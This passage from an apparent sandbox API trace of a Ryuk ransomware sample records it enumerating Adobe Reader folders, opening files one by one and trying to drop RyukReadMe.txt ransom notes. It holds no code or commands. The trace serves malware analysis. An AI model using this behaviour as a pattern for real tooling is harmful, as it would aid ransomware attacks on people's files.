(lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.265] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.265] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.265] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.265] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.265] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.RUS", dwFileAttributes=0x80) returned 0 [0138.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.266] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.266] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.266] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.266] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SKY", dwFileAttributes=0x80) returned 0 [0138.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.266] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.266] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.266] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.267] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SLV", dwFileAttributes=0x80) returned 0 [0138.267] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.267] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.267] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.267] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.268] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SUO", dwFileAttributes=0x80) returned 0 [0138.268] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.268] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.268] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.268] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.268] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.268] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SVE", dwFileAttributes=0x80) returned 0 [0138.268] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.268] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.268] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.269] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.269] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.269] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.TUR", dwFileAttributes=0x80) returned 0 [0138.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.269] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.269] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.269] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.269] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.UKR", dwFileAttributes=0x80) returned 0 [0138.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.269] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.270] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.270] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.270] SetLastError (dwErrCode=0x0) [0138.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.273] GetLastError () returned 0x5 [0138.273] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.273] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.273] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.273] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.273] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.273] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.273] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.273] SetLastError (dwErrCode=0x0) [0138.273] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.273] GetLastError () returned 0x5 [0138.273] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.273] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.275] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.275] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.275] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.275] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CAT", dwFileAttributes=0x80) returned 0 [0138.276] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.276] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.276] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.276] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.276] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.276] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CHS", dwFileAttributes=0x80) returned 0 [0138.277] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.277] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.277] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.277] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.277] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CHT", dwFileAttributes=0x80) returned 0 [0138.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.278] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.278] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.278] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CZE", dwFileAttributes=0x80) returned 0 [0138.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.279] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.279] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.279] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.279] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.279] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DAN", dwFileAttributes=0x80) returned 0 [0138.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.279] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.279] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.280] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.280] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.280] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DEU", dwFileAttributes=0x80) returned 0 [0138.280] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.280] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.280] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.281] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.281] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.281] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.281] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.ESP", dwFileAttributes=0x80) returned 0 [0138.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.281] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.281] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.281] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.281] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.EUQ", dwFileAttributes=0x80) returned 0 [0138.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.282] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.282] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.282] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.282] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.282] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.FRA", dwFileAttributes=0x80) returned 0 [0138.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.283] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.283] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.283] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.283] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.HRV", dwFileAttributes=0x80) returned 0 [0138.283] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.283] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.283] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.283] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.283] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.HUN", dwFileAttributes=0x80) returned 0 [0138.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.284] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.284] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.284] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.284] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.ITA", dwFileAttributes=0x80) returned 0 [0138.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.284] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.284] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.284] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.285] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.JPN", dwFileAttributes=0x80) returned 0 [0138.285] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.285] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.285] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.285] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.285] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.KOR", dwFileAttributes=0x80) returned 0 [0138.285] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.285] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.286] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.286] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.286] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.NLD", dwFileAttributes=0x80) returned 0 [0138.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.286] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.286] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.286] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.286] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.286] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.NOR", dwFileAttributes=0x80) returned 0 [0138.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.286] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.287] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.287] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.287] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.POL", dwFileAttributes=0x80) returned 0 [0138.287] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.287] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.287] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.287] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.287] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.PTB", dwFileAttributes=0x80) returned 0 [0138.287] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.288] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.288] VirtualFree (lpAddress=0x350000, dwSize=0x0, 